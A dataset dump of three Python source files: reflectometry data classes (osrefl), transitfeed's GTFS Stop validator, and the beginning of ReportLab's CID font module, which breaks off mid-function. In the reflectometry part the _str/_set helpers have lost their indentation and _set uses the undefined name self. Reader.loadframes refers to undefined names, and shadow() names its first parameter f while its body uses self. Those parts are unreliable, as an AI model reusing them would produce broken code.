    def __str__(self):
        return _str(self)
class Monitor(object):
    """
    Define the monitor properties.

    The monitor is essential to normalization: reflectivity is detected
    counts divided by incident counts, so both must be normalized to a
    common rate basis -- monitor counts, seconds, or units of source
    power (e.g. coulombs of protons, or megawatt hours of reactor power).

    counts (n x k counts)
        Monitor counts: one per measurement on scanning instruments, one
        per time channel on TOF.  May be absent, in which case normalize
        by time or power.  Users may also synthesize a counts vector
        (e.g. from an estimated rate) to combine time-normalized with
        monitor-normalized data when the monitor is unreliable.
        Variance is assumed to be the number of counts after rebinning.
    count_time (n seconds)
        Duration of each measurement (one value for the whole
        measurement on TOF).
    source_power (n source_power_units)
        Source power per measurement; a proxy for the monitor (proton
        charge or integrated reactor power) when monitor counts cannot
        be trusted, provided slit scan and reflectivity are normalized
        by the same quantity.  Usually a better proxy than duration.
    base ('time' | 'counts' | 'power')
        Rate basis used to normalize the data; initialized by the file
        loader, may be overridden during reduction.
    time_step (seconds)
        Reporting unit of the count_time timer (e.g. hundredths of a
        minute for NCNR ICP files).  Timing uncertainty is uniform over
        the step, gaussian approximation sqrt(time_step/12).
    start_time (n seconds)
        Start of each measurement relative to the start of the scan
        (zero for TOF).  Not simply the sum of count times because of
        motor movement; needed to align measurements with environment
        logs and for He3 polarization calculations.
    distance (metre)
        Distance from the sample; informational only.
    sampled_fraction ([0,1])
        Portion of neutrons sampled by the monitor.  If the monitor is
        after the second slit this scales monitor counts into expected
        detector counts; otherwise a full slit scan is required.  It is
        the inverse of the detector/monitor ratio used on some
        instruments.
    time_of_flight (k+1 millisecond)
        Time boundaries for the time-of-flight measurement.
    source_power_units ('coulombs' | 'megawatthours')
        Units for source power.
    source_power_variance (n source_power_units)
        Variance in the measured source power.
    monitor_rate (counts/second)
        Estimated monitor rate, for normalizing by counts when only the
        count time was recorded.
    """
    properties = ['distance','sampled_fraction','counts','start_time',
                  'count_time','time_step','time_of_flight','base',
                  'monitor_rate','source_power','source_power_units']
    distance = None
    sampled_fraction = None
    counts = None
    start_time = None
    count_time = None
    time_step = 1           # default to nearest second
    time_of_flight = None
    base = 'counts'
    source_power = 1        # default to 1 MW power
    source_power_units = "MW"
    source_power_variance = 0
    monitor_rate = 0        # counts/sec

    def __init__(self, **kw):
        _set(self, kw)

    def __str__(self):
        return _str(self)
class Moderator(object):
    """
    Moderator information needed for time of flight calculations --
    primarily the flight path length from moderator to monitor or
    detector, which is required to compute wavelength.

    Moderator temperature is also recorded; users should probably be
    warned when combining datasets with different moderator
    temperatures since that likely changes the wavelength spectrum.

    distance (metre)
        Distance from moderator to sample; negative, since the
        moderator is certainly before the sample.
    temperature (kelvin)
        Temperature of the moderator.
    type (string)
        For information only at this point.
    """
    properties = ['distance','temperature','type']
    distance = None
    temperature = None
    type = 'Unknown'

    def __init__(self, **kw):
        _set(self, kw)

    def __str__(self):
        return _str(self)
class Warning(object):
    """
    An information message plus a possible set of actions to take in
    response to it.

    The user interface can query the message and the action list and
    build a dialog from them; actions may carry attributes that must
    be set for the action to complete.

    NOTE: this class shadows the builtin ``Warning`` within this module.
    """
    pass
class WarningWavelength(Warning):
    """
    Unexpected wavelength warning.

    Attached to any dataset whose stored wavelength differs by more
    than 1% from the instrument's default wavelength.

    Possible responses include always taking the instrument default,
    or overriding every value in the dataset.
    """
    pass
class ReflData(object):
    """
    Reflectometry measurement container.

    slit1, slit2 (Slit)
        Presample slits.
    slit3, slit4 (Slit)
        Post sample slits.
    sample (Sample)
        Sample geometry.
    detector (Detector)
        Detector geometry, efficiency and counts.
    monitor (Monitor)
        Counts and/or durations.
    polarization
        '' unpolarized; '+' spin up; '-' spin down; '++'/'--'
        non-spin-flip; '-+'/'+-' spin flip.
    points
        For scanning instruments, the number of measurements.
    channels
        For time of flight, the number of time channels; for white
        beam instruments, the number of analysers.
    reversed (False)
        True if the measurement is reversed, in which case sample and
        detector angles need to be negated and pixel directions
        reversed when computing pixel coordinates.
    roi (ROI)
        Region of interest on the detector.
    display_monitor (counts)
        Default monitor to use when displaying data from this dataset.

    File details
    ============
    instrument (string); probe ('neutron' or 'xray'); path (string);
    entry (string); name (string, possibly filename plus entry number);
    description (string); date (timestamp); duration (second);
    warnings (list generated at load time); intent (purpose of the
    measurement: intensity, specular, q_offset, sample_offset,
    detector_offset, slice, area, alignment, other).

    Format specific fields such as *file* (format specific file handle)
    are ignored by the reduction software.
    """
    properties = ['instrument','geometry','probe','points','channels',
                  'name','description','date','duration','attenuator',
                  'polarization','reversed','warnings','path','entry']
    geometry = "vertical"
    probe = "unknown"
    format = "unknown"
    path = "unknown"
    entry = ""
    points = 1
    channels = 1
    name = ""
    description = ""
    date = datetime.datetime(1970,1,1)
    duration = 0
    file = None
    attenuator = 1.
    polarization = ''
    reversed = False
    warnings = None
    messages = None

    # dR is stored internally as a variance (varR).
    def _getdR(self):
        return sqrt(self.varR)
    def _setdR(self, dR):
        self.varR = dR**2
    dR = property(_getdR, _setdR)

    # Data representation for a generic plotter as (x,y,z,v).
    # NOTE(review): x maps to Qz and y to Qx while the labels say "Qx"
    # and "Qy" respectively -- possibly intentional for plotting, but
    # worth confirming against the plotting code.
    # TODO: subclass Data so we get pixel edges calculations
    def _getx(self):
        return self.Qz
    def _gety(self):
        return self.Qx
    def _getz(self):
        return self.Qy
    def _getv(self):
        return self.R
    def _getdv(self):
        return sqrt(self.varR)
    x = property(_getx)
    xlabel, xunits = "Qx", "inv A"
    y = property(_gety)
    ylabel, yunits = "Qy", "inv A"
    z = property(_getz)
    zlabel, zunits = "Qz", "inv A"
    v = property(_getv)
    dv = property(_getdv)
    # vlabel and vunits depend on monitor normalization

    def __init__(self, **kw):
        # Note: because _set runs ahead of the assignments below, the
        # caller cannot specify sample, slit, detector or monitor on
        # creation; use the instances provided by the class instead.
        _set(self, kw)
        self.sample = Sample()
        self.slit1 = Slit()
        self.slit2 = Slit()
        self.slit3 = Slit()
        self.slit4 = Slit()
        self.detector = Detector()
        self.monitor = Monitor()
        self.moderator = Moderator()
        self.warnings = []
        self.roi = ROI()
        self.messages = []

    def __str__(self):
        parts = [_str(self)]
        for section in [self.slit1, self.slit2, self.slit3, self.slit4,
                        self.sample, self.detector, self.monitor,
                        self.roi]:
            parts.append(str(section))
        return "\n".join(parts)

    def warn(self, msg):
        """Record a warning that should be displayed to the user"""
        self.warnings.append(msg)

    def log(self, msg):
        """Record corrections that have been applied to the data"""
        self.messages.append(msg)

    def apply(self, correction):
        """Allow alternative syntax: data.apply(correction)"""
        self.log(str(correction))
        correction.apply(self)

    def resetQ(self):
        """Recompute Qx,Qz from geometry and wavelength"""
        A, B = self.sample.angle_x, self.detector.angle_x
        L = self.detector.wavelength
        self.Qx, self.Qz = ABL_to_QxQz(A, B, L)
def _str(object):
"""
Helper function: document data object by convert attributes listed in
properties into a string.
"""
cls = object.__class__.__name__
props = [a+"="+str(getattr(object,a)) for a in object.properties]
return "%s %s"%(cls,"\n ".join(props))
def _set(object,kw):
'''
Helper function: distribute the __init__ keyward paramters to
individual attributes of an object, raising AttributeError if
the class does not define the given attribute.
Example:
def __init__(self, **kw): _set(self,kw)
'''
for k,v in kw.iteritems():
if hasattr(self,k):
setattr(object,k,v)
else:
raise AttributeError, "Unknown attribute %s"%(k)
# Ignore the remainder of this file --- I don't yet have the computational
# interface set up.
"""
Computed values
===============
edges_x (metric=['pixel'|'mm'|'degrees'|'radians'],frame=0)
Returns the nx+1 pixel edges of the detector in the given units.
In distance units, this is the distance relative to the center
of the detector arm.
edges_y (metric=['pixel'|'mm'|'degrees'|'radians'],frame=0)
Returns the ny+1 pixel edges of the detector in the given units.
def resolution(self):
return
"""
# === Interaction with individual frames ===
class Reader(ReflData):
    """Measurement record plus access to individual detector frames.

    NOTE(review): the file comment above this class says to ignore the
    remainder of the file — the frame interface is unfinished, and several
    names used below (zlo, zhi, Limits) are not defined in the visible code.
    """
    def numframes(self):
        """
        Return the number of detector frames available.
        """
        return self.channels*self.points

    def loadframes(self):
        """
        Convert raw frames into a form suitable for display.
        """
        # Hold a reference to the counts so that they are not purged
        # from memory during the load operation.
        xlo,xhi,ylo,yhi = self.roi
        counts = self.detector.counts
        # NOTE(review): zlo/zhi are undefined in this scope — calling this
        # raises NameError; presumably they describe the frame range.
        nq = zhi-zlo+1
        nx = self.detector.shape[0]
        ny = self.detector.shape[1]
        if ny == 1:
            # 1-D detector: slice the requested frames directly.
            self.zx = counts[zlo:zhi+1,:]
        else:
            xy = numpy.zeros((nx,ny),dtype='float32')
            zx = numpy.zeros((nq,nx),dtype='float32')
            self.framerange = Limits() # Keep track of total range
            # NOTE(review): range(zlo,zhi) skips frame zhi even though nq
            # counts it — confirm whether this should be range(zlo,zhi+1).
            for i in range(zlo,zhi):
                v = self.frame(i)
                self.framerange.add(v,dv=sqrt(v))
                xy += v
                # collapse the y (detector column) axis within the ROI
                zx[i-zlo,:] = numpy.sum(v[:,ylo:yhi],axis=1)
            self.xy = xy
            self.zx = zx

    def frame(self,index):
        """
        Return the 2-D detector frame for the given index k.  For
        multichannel instruments, index is the index for the channel
        otherwise index is the measurement number.

        The result is undefined if the detector is not a 2-D detector.
        """
        if self.channels > 1:
            return self.detector.counts[:,index]
        else:
            return self.detector.counts[index,:]

    def shadow(f, beamstop, frame):
        """
        Construct a mask for the detector frame indicating which pixels
        are outside the shadow of the beamstop.  This pixels should not
        be used when estimating sample background.  Note that this becomes
        considerably more tricky when angular divergence and gravity
        are taken into account.  The mask should include enough of the
        penumbra that these effects can be ignored.

        Currently this function returns no shadow.
        """
        # NOTE(review): the first parameter is named f but the body uses
        # self — calling this raises NameError; rename f to self.
        mask = numpy.ones(self.detector.shape,'int8')
        if beamstop.ispresent:
            # calculate location of the beamstop centre relative to
            # the detector.
            pass
        return mask
|
reflectometry/osrefl
|
osrefl/loaders/reduction/refldata.py
|
Python
|
bsd-3-clause
| 32,276
|
[
"Gaussian"
] |
d2523f02c20d5392cd7eae960499cb9eab76e203ccc80a907457087af4feb0ee
|
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from gtfsobjectbase import GtfsObjectBase
import problems as problems_module
import util
class Stop(GtfsObjectBase):
    """Represents a single stop. A stop must have a latitude, longitude and name.

    Callers may assign arbitrary values to instance attributes.
    Stop.ParseAttributes validates attributes according to GTFS and converts some
    into native types. ParseAttributes may delete invalid attributes.
    Accessing an attribute that is a column in GTFS will return None if this
    object does not have a value or it is ''.
    A Stop object acts like a dict with string values.

    Attributes:
      stop_lat: a float representing the latitude of the stop
      stop_lon: a float representing the longitude of the stop
    All other attributes are strings.
    """
    # Columns every stops.txt row must provide.
    _REQUIRED_FIELD_NAMES = ['stop_id', 'stop_name', 'stop_lat', 'stop_lon']
    # Full set of handled columns, including non-core extensions
    # (stop_country, admin levels, border, platform_code).
    _FIELD_NAMES = _REQUIRED_FIELD_NAMES + \
                   ['stop_desc', 'zone_id', 'stop_url', 'stop_code',
                    'location_type', 'parent_station', 'stop_timezone',
                    'wheelchair_boarding', 'stop_country', 'stop_country_code',
                    'stop_city', 'stop_admin_level1', 'stop_admin_level2',
                    'stop_admin_level3', 'border', 'platform_code']
    _TABLE_NAME = 'stops'
    # location_type value marking a row as a station rather than a plain stop.
    LOCATION_TYPE_STATION = 1
def __init__(self, lat=None, lng=None, name=None, stop_id=None,
             field_dict=None, stop_code=None):
    """Initialize a new Stop object.

    Args:
      field_dict: A dictionary mapping attribute name to unicode string
      lat: a float, ignored when field_dict is present
      lng: a float, ignored when field_dict is present
      name: a string, ignored when field_dict is present
      stop_id: a string, ignored when field_dict is present
      stop_code: a string, ignored when field_dict is present
    """
    self._schedule = None
    if field_dict:
        if isinstance(field_dict, self.__class__):
            # Special case so that we don't need to re-parse the attributes
            # to native types; iteritems returns all attributes that don't
            # start with _
            for k, v in field_dict.iteritems():
                self.__dict__[k] = v
        else:
            self.__dict__.update(field_dict)
    else:
        # Only assign the attributes that were actually supplied, so that
        # missing columns keep their class-level defaults.
        if lat is not None:
            self.stop_lat = lat
        if lng is not None:
            self.stop_lon = lng
        if name is not None:
            self.stop_name = name
        if stop_id is not None:
            self.stop_id = stop_id
        if stop_code is not None:
            self.stop_code = stop_code
def GetTrips(self, schedule=None):
    """Return iterable containing trips that visit this stop."""
    return [trip for trip, ss in self._GetTripSequence(schedule)]

def _GetTripSequence(self, schedule=None):
    """Return a list of (trip, stop_sequence) for all trips visiting this stop.

    A trip may be in the list multiple times with different index.
    stop_sequence is an integer.

    Args:
      schedule: Deprecated, do not use.
    """
    if schedule is None:
        schedule = getattr(self, "_schedule", None)
    if schedule is None:
        # NOTE(review): after this warning, schedule is still None and the
        # cursor() call below raises AttributeError — confirm intent.
        warnings.warn("No longer supported. _schedule attribute is used to get "
                      "stop_times table", DeprecationWarning)
    cursor = schedule._connection.cursor()
    cursor.execute("SELECT trip_id,stop_sequence FROM stop_times "
                   "WHERE stop_id=?",
                   (self.stop_id, ))
    return [(schedule.GetTrip(row[0]), row[1]) for row in cursor]
def _GetTripIndex(self, schedule=None):
    """Return a list of (trip, index).

    trip: a Trip object
    index: an offset in trip.GetStopTimes()

    Raises:
      RuntimeError: if a stop_sequence reported by the stop_times table is
        not present in the trip's GetStopTimes().
    """
    trip_index = []
    for trip, sequence in self._GetTripSequence(schedule):
        for index, st in enumerate(trip.GetStopTimes()):
            if st.stop_sequence == sequence:
                trip_index.append((trip, index))
                break
        else:
            # Bug fix: the format arguments must be a tuple.  The original
            # `... % sequence, trip.trip_id` passed trip.trip_id as a second
            # argument to RuntimeError and crashed with "not enough
            # arguments for format string" instead of the intended message.
            raise RuntimeError("stop_sequence %d not found in trip_id %s" %
                               (sequence, trip.trip_id))
    return trip_index
def GetStopTimeTrips(self, schedule=None):
    """Return a list of (time, (trip, index), is_timepoint).

    time: an integer. It might be interpolated.
    trip: a Trip object.
    index: the offset of this stop in trip.GetStopTimes(), which may be
      different from the stop_sequence.
    is_timepoint: a bool
    """
    rows = []
    for trip, offset in self._GetTripIndex(schedule):
        secs, _stoptime, is_timepoint = trip.GetTimeInterpolatedStops()[offset]
        rows.append((secs, (trip, offset), is_timepoint))
    return rows
def __getattr__(self, name):
    """Return None or the default value if name is a known attribute.

    This method is only called when name is not found in __dict__.
    """
    if name == "location_type":
        # A missing location_type defaults to 0 (a plain stop).
        return 0
    elif name == "trip_index":
        # Computed lazily from the schedule's stop_times table.
        return self._GetTripIndex()
    else:
        # NOTE(review): assumes GtfsObjectBase defines __getattr__ (plain
        # object does not) — confirm against gtfsobjectbase.py.
        return super(Stop, self).__getattr__(name)
def ValidateStopLatitude(self, problems):
    """Coerce stop_lat to float and flag values outside [-90, 90]."""
    raw = self.stop_lat
    if raw is None:
        return
    try:
        if not isinstance(raw, (float, int)):
            self.stop_lat = util.FloatStringToFloat(raw, problems)
    except (ValueError, TypeError):
        problems.InvalidValue('stop_lat', raw)
        del self.stop_lat
    else:
        if not -90 <= self.stop_lat <= 90:
            problems.InvalidValue('stop_lat', raw)

def ValidateStopLongitude(self, problems):
    """Coerce stop_lon to float and flag values outside [-180, 180]."""
    raw = self.stop_lon
    if raw is None:
        return
    try:
        if not isinstance(raw, (float, int)):
            self.stop_lon = util.FloatStringToFloat(raw, problems)
    except (ValueError, TypeError):
        problems.InvalidValue('stop_lon', raw)
        del self.stop_lon
    else:
        if not -180 <= self.stop_lon <= 180:
            problems.InvalidValue('stop_lon', raw)
def ValidateStopUrl(self, problems):
    """Delete stop_url if it fails URL validation."""
    url = self.stop_url
    if url:
        if not util.ValidateURL(url, 'stop_url', problems):
            del self.stop_url

def ValidateStopLocationType(self, problems):
    """Coerce location_type to int; only 0 (stop) and 1 (station) are valid."""
    raw = self.location_type
    if raw == '':
        self.location_type = 0
        return
    try:
        self.location_type = int(raw)
    except (ValueError, TypeError):
        problems.InvalidValue('location_type', raw)
        del self.location_type
        return
    # Other integers are reported only as a warning.
    if self.location_type not in (0, 1):
        problems.InvalidValue('location_type', raw,
                              type=problems_module.TYPE_WARNING)
def ValidateStopRequiredFields(self, problems):
    """Report every required column that is missing or blank."""
    for field in self._REQUIRED_FIELD_NAMES:
        if util.IsEmpty(getattr(self, field, None)):
            self._ReportMissingRequiredField(problems, field)

def _ReportMissingRequiredField(self, problems, required):
    # TODO: For now we are keeping the API stable but it would be cleaner to
    # treat whitespace stop_id as invalid, instead of missing
    problems.MissingValue(required)
    setattr(self, required, None)

def ValidateStopNotTooCloseToOrigin(self, problems):
    """Warn when a stop sits within one degree of (0, 0) — usually bad data."""
    lat = self.stop_lat
    lon = self.stop_lon
    if lat is None or lon is None:
        return
    if abs(lat) < 1.0 and abs(lon) < 1.0:
        problems.InvalidValue('stop_lat', lat,
                              'Stop location too close to 0, 0',
                              type=problems_module.TYPE_WARNING)
def ValidateStopDescriptionAndNameAreDifferent(self, problems):
    # A stop_desc that merely repeats stop_name adds no information.
    if (self.stop_desc and self.stop_name and
        not util.IsEmpty(self.stop_desc) and
        self.stop_name.strip().lower() == self.stop_desc.strip().lower()):
        problems.InvalidValue('stop_desc', self.stop_desc,
                              'stop_desc should not be the same as stop_name',
                              type=problems_module.TYPE_WARNING)

def ValidateStopIsNotStationWithParent(self, problems):
    # GTFS: a station (location_type=1) must not itself have a parent_station.
    if self.parent_station and self.location_type == 1:
        problems.InvalidValue('parent_station', self.parent_station,
                              'Stop row with location_type=1 (a station) must '
                              'not have a parent_station')

def ValidateStopTimezone(self, problems):
    # Entrances or other child stops (having a parent station) must not have a
    # stop_timezone.
    util.ValidateTimezone(self.stop_timezone, 'stop_timezone', problems)
    # NOTE(review): the child-stop check described above is currently
    # disabled; the commented code below would enforce it.
    # if (not util.IsEmpty(self.parent_station) and
    #     not util.IsEmpty(self.stop_timezone)):
    #   problems.InvalidValue('stop_timezone', self.stop_timezone,
    #       reason='a stop having a parent stop must not have a stop_timezone',
    #       type=problems_module.TYPE_WARNING)

def ValidateWheelchairBoarding(self, problems):
    # When present, wheelchair_boarding must be one of the yes/no/unknown codes.
    if self.wheelchair_boarding:
        util.ValidateYesNoUnknown(
            self.wheelchair_boarding, 'wheelchair_boarding', problems)
def ValidateBeforeAdd(self, problems):
    """Run all per-row checks; reports issues but never blocks the add."""
    # First check that all required fields are present because ParseAttributes
    # may remove invalid attributes.
    self.ValidateStopRequiredFields(problems)

    # If value is valid for attribute name store it.
    # If value is not valid call problems. Return a new value of the correct
    # type or None if value couldn't be converted.
    self.ValidateStopLatitude(problems)
    self.ValidateStopLongitude(problems)
    self.ValidateStopUrl(problems)
    self.ValidateStopLocationType(problems)
    self.ValidateStopTimezone(problems)
    self.ValidateWheelchairBoarding(problems)

    # Check that this object is consistent with itself
    self.ValidateStopNotTooCloseToOrigin(problems)
    self.ValidateStopDescriptionAndNameAreDifferent(problems)
    self.ValidateStopIsNotStationWithParent(problems)

    # None of these checks are blocking
    return True

def ValidateAfterAdd(self, problems):
    """No cross-table checks are needed for stops after insertion."""
    return

def Validate(self, problems=problems_module.default_problem_reporter):
    """Run both validation phases against the given problem reporter."""
    self.ValidateBeforeAdd(problems)
    self.ValidateAfterAdd(problems)

def AddToSchedule(self, schedule, problems):
    """Register this stop with *schedule* (delegates to AddStopObject)."""
    schedule.AddStopObject(self, problems)
|
bileto/transitfeed
|
transitfeed/stop.py
|
Python
|
apache-2.0
| 10,635
|
[
"VisIt"
] |
085e20ebc847613bd978ed29d3f0858aac0d422499c580196f83eeebbcb51e6e
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/pdfbase/cidfonts.py
#$Header $
__version__=''' $Id: cidfonts.py 3710 2010-05-14 16:00:58Z rgbecker $ '''
__doc__="""CID (Asian multi-byte) font support.
This defines classes to represent CID fonts. They know how to calculate
their own width and how to write themselves into PDF files."""
import os
from types import ListType, TupleType, DictType
from string import find, split, strip
import marshal
import time
try:
from hashlib import md5
except ImportError:
from md5 import md5
import reportlab
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase._cidfontdata import allowedTypeFaces, allowedEncodings, CIDFontInfo, \
defaultUnicodeEncodings, widthsByUnichar
from reportlab.pdfgen.canvas import Canvas
from reportlab.pdfbase import pdfdoc
from reportlab.pdfbase.pdfutils import _escape
from reportlab.rl_config import CMapSearchPath
#quick hackery for 2.0 release. Now we always do unicode, and have built in
#the CMAP data, any code to load CMap files is not needed.
# When True, CIDEncoding.__init__ skips CMAP parsing/caching entirely.
DISABLE_CMAP = True
def findCMapFile(name):
    """Return the full path of CMAP file *name*, searching CMapSearchPath.

    Raises IOError when the file is not found in any search directory.
    """
    # Search each configured directory in order; first hit wins.
    for dirname in CMapSearchPath:
        cmapfile = os.path.join(dirname, name)
        if os.path.isfile(cmapfile):
            return cmapfile
    # Call-form raise: the original `raise IOError, msg` is Python-2-only
    # syntax; this form behaves identically on Python 2 and also parses on 3.
    raise IOError('CMAP file for encodings "%s" not found!' % name)
def structToPDF(structure):
    "Converts deeply nested structure to PDFdoc dictionary/array objects"
    # Recursive walk: dicts become PDFDictionary, lists/tuples become
    # PDFArray; exact type() checks mirror the original behaviour (subclasses
    # fall through to the scalar branch).
    if type(structure) is DictType:
        newDict = {}
        for k, v in structure.items():
            newDict[k] = structToPDF(v)
        return pdfdoc.PDFDictionary(newDict)
    elif type(structure) in (ListType, TupleType):
        newList = []
        for elem in structure:
            newList.append(structToPDF(elem))
        return pdfdoc.PDFArray(newList)
    else:
        # Scalars (strings, numbers, existing PDF objects) pass through.
        return structure
class CIDEncoding(pdfmetrics.Encoding):
    """Multi-byte encoding. These are loaded from CMAP files.

    A CMAP file is like a mini-codec. It defines the correspondence
    between code points in the (multi-byte) input data and Character
    IDs. """
    # aims to do similar things to Brian Hooper's CMap class,
    # but I could not get it working and had to rewrite.
    # also, we should really rearrange our current encoding
    # into a SingleByteEncoding since many of its methods
    # should not apply here.

    def __init__(self, name, useCache=1):
        self.name = name
        self._mapFileHash = None       # MD5 digest of the source CMAP file
        self._codeSpaceRanges = []     # (start, end) valid code ranges
        self._notDefRanges = []        # (start, end, cid) fallbacks
        self._cmap = {}                # code point -> CID
        self.source = None
        if not DISABLE_CMAP:
            # Prefer a previously marshalled '.fastmap' cache; otherwise parse
            # the PostScript CMAP file and (when caching) save the result.
            if useCache:
                from reportlab.lib.utils import get_rl_tempdir
                fontmapdir = get_rl_tempdir('FastCMAPS')
                if os.path.isfile(fontmapdir + os.sep + name + '.fastmap'):
                    self.fastLoad(fontmapdir)
                    self.source = fontmapdir + os.sep + name + '.fastmap'
                else:
                    self.parseCMAPFile(name)
                    self.source = 'CMAP: ' + name
                    self.fastSave(fontmapdir)
            else:
                self.parseCMAPFile(name)
def _hash(self, text):
    """Return the binary MD5 digest of *text* (fingerprints a CMAP file)."""
    return md5(text).digest()
def parseCMAPFile(self, name):
    """This is a tricky one as CMAP files are Postscript
    ones. Some refer to others with a 'usecmap'
    command.

    Populates _codeSpaceRanges, _notDefRanges and _cmap by a crude
    token-stream scan of the file located via findCMapFile(name).
    """
    #started = time.clock()
    cmapfile = findCMapFile(name)
    # this will CRAWL with the unicode encodings...
    rawdata = open(cmapfile, 'r').read()
    self._mapFileHash = self._hash(rawdata)

    #if it contains the token 'usecmap', parse the other
    #cmap file first....
    usecmap_pos = find(rawdata, 'usecmap')
    if usecmap_pos > -1:
        #they tell us to look in another file
        #for the code space ranges. The one
        # to use will be the previous word.
        chunk = rawdata[0:usecmap_pos]
        words = split(chunk)
        otherCMAPName = words[-1]
        #print 'referred to another CMAP %s' % otherCMAPName
        self.parseCMAPFile(otherCMAPName)
        # now continue parsing this, as it may
        # override some settings

    words = split(rawdata)
    while words != []:
        if words[0] == 'begincodespacerange':
            # Pairs of <hex> <hex> until the matching end token.
            words = words[1:]
            while words[0] != 'endcodespacerange':
                strStart, strEnd, words = words[0], words[1], words[2:]
                start = int(strStart[1:-1], 16)
                end = int(strEnd[1:-1], 16)
                self._codeSpaceRanges.append((start, end),)
        elif words[0] == 'beginnotdefrange':
            # Triples of <hex> <hex> <int>: fallback CID for a range.
            words = words[1:]
            while words[0] != 'endnotdefrange':
                strStart, strEnd, strValue = words[0:3]
                start = int(strStart[1:-1], 16)
                end = int(strEnd[1:-1], 16)
                value = int(strValue)
                self._notDefRanges.append((start, end, value),)
                words = words[3:]
        elif words[0] == 'begincidrange':
            words = words[1:]
            while words[0] != 'endcidrange':
                strStart, strEnd, strValue = words[0:3]
                start = int(strStart[1:-1], 16)
                end = int(strEnd[1:-1], 16)
                value = int(strValue)
                # this means that 'start' corresponds to 'value',
                # start+1 corresponds to value+1 and so on up
                # to end
                offset = 0
                while start + offset <= end:
                    self._cmap[start + offset] = value + offset
                    offset = offset + 1
                words = words[3:]
        else:
            # Unrecognised token: skip it.
            words = words[1:]
    #finished = time.clock()
    #print 'parsed CMAP %s in %0.4f seconds' % (self.name, finished - started)
def translate(self, text):
    """Convert a string into a list of CIDs.

    Bytes are consumed one at a time; a byte that does not fall in any
    code-space range on its own is held as lastChar and combined with the
    next byte into a two-byte code.
    """
    output = []
    cmap = self._cmap
    lastChar = ''
    for char in text:
        if lastChar != '':
            #print 'convert character pair "%s"' % (lastChar + char)
            num = ord(lastChar) * 256 + ord(char)
        else:
            #print 'convert character "%s"' % char
            num = ord(char)
        lastChar = char
        found = 0
        for low, high in self._codeSpaceRanges:
            # NOTE(review): bounds are exclusive (low < num < high) — confirm
            # whether codes equal to a range endpoint should match (<=).
            if low < num < high:
                try:
                    cid = cmap[num]
                    #print '%d -> %d' % (num, cid)
                except KeyError:
                    #not defined.  Try to find the appropriate
                    # notdef character, or failing that return
                    # zero
                    cid = 0
                    for low2, high2, notdef in self._notDefRanges:
                        if low2 < num < high2:
                            cid = notdef
                            break
                output.append(cid)
                found = 1
                break
        if found:
            # Code consumed; start fresh on the next byte.
            lastChar = ''
        else:
            # Hold this byte to pair it with the next one.
            lastChar = char
    return output
def fastSave(self, directory):
    """Marshal the parsed encoding tables to <name>.fastmap in *directory*.

    Fix: the file handle is now closed via try/finally, so it is not leaked
    if one of the marshal.dump calls raises (the original only closed on
    success).
    """
    f = open(os.path.join(directory, self.name + '.fastmap'), 'wb')
    try:
        # Order matters: fastLoad reads the fields back in this sequence.
        marshal.dump(self._mapFileHash, f)
        marshal.dump(self._codeSpaceRanges, f)
        marshal.dump(self._notDefRanges, f)
        marshal.dump(self._cmap, f)
    finally:
        f.close()
def fastLoad(self, directory):
    """Load previously marshalled encoding tables from <name>.fastmap.

    Fixes: removed the dead time.clock() timing calls (their results were
    only used by a commented-out print, and time.clock is deprecated /
    removed in modern Python); the file handle is closed via try/finally.
    """
    f = open(os.path.join(directory, self.name + '.fastmap'), 'rb')
    try:
        # Fields must be read back in exactly the order fastSave wrote them.
        self._mapFileHash = marshal.load(f)
        self._codeSpaceRanges = marshal.load(f)
        self._notDefRanges = marshal.load(f)
        self._cmap = marshal.load(f)
    finally:
        f.close()
def getData(self):
    """Simple persistence helper. Return a dict with all that matters."""
    data = {}
    data['mapFileHash'] = self._mapFileHash
    data['codeSpaceRanges'] = self._codeSpaceRanges
    data['notDefRanges'] = self._notDefRanges
    data['cmap'] = self._cmap
    return data
class CIDTypeFace(pdfmetrics.TypeFace):
    """Multi-byte type face.

    Conceptually similar to a single byte typeface,
    but the glyphs are identified by a numeric Character
    ID (CID) and not a glyph name. """
    def __init__(self, name):
        """Initialised from one of the canned dictionaries in allowedEncodings
        Or rather, it will be shortly..."""
        pdfmetrics.TypeFace.__init__(self, name)
        self._extractDictInfo(name)

    def _extractDictInfo(self, name):
        # Pull ascent/descent and the width tables for this face out of the
        # static CIDFontInfo dictionary.
        try:
            fontDict = CIDFontInfo[name]
        except KeyError:
            # Call-form raise: the original `raise KeyError, (...)` is
            # Python-2-only syntax; this form behaves the same on 2 and 3.
            raise KeyError("Unable to find information on CID typeface '%s'" % name +
                           "Only the following font names work:" + repr(allowedTypeFaces))
        descFont = fontDict['DescendantFonts'][0]
        self.ascent = descFont['FontDescriptor']['Ascent']
        self.descent = descFont['FontDescriptor']['Descent']
        self._defaultWidth = descFont['DW']
        self._explicitWidths = self._expandWidths(descFont['W'])
        # should really support self.glyphWidths, self.glyphNames
        # but not done yet.
def _expandWidths(self, compactWidthArray):
    """Expands Adobe nested list structure to get a dictionary of widths.

    Here is an example of such a structure.::

        (
        # starting at character ID 1, next n characters have the widths given.
        1,  (277,305,500,668,668,906,727,305,445,445,508,668,305,379,305,539),
        # all Characters from ID 17 to 26 are 668 em units wide
        17, 26, 668,
        27, (305, 305, 668, 668, 668, 566, 871, 727, 637, 652, 699, 574, 555,
            676, 687, 242, 492, 664, 582, 789, 707, 734, 582, 734, 605, 605,
            641, 668, 727, 945, 609, 609, 574, 445, 668, 445, 668, 668, 590,
            555, 609, 547, 602, 574, 391, 609, 582, 234, 277, 539, 234, 895,
            582, 605, 602, 602, 387, 508, 441, 582, 562, 781, 531, 570, 555,
            449, 246, 449, 668),
        # these must be half width katakana and the like.
        231, 632, 500
        )
    """
    data = compactWidthArray[:]
    widths = {}
    while data:
        # Each run starts with a character ID...
        start, data = data[0], data[1:]
        if type(data[0]) in (ListType, TupleType):
            # ...followed either by an explicit width list for consecutive IDs,
            items, data = data[0], data[1:]
            for offset in range(len(items)):
                widths[start + offset] = items[offset]
        else:
